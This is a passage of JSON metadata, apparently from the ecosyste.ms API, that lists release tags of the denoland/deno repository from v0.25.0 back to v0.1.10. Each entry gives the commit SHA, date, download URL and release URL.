5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste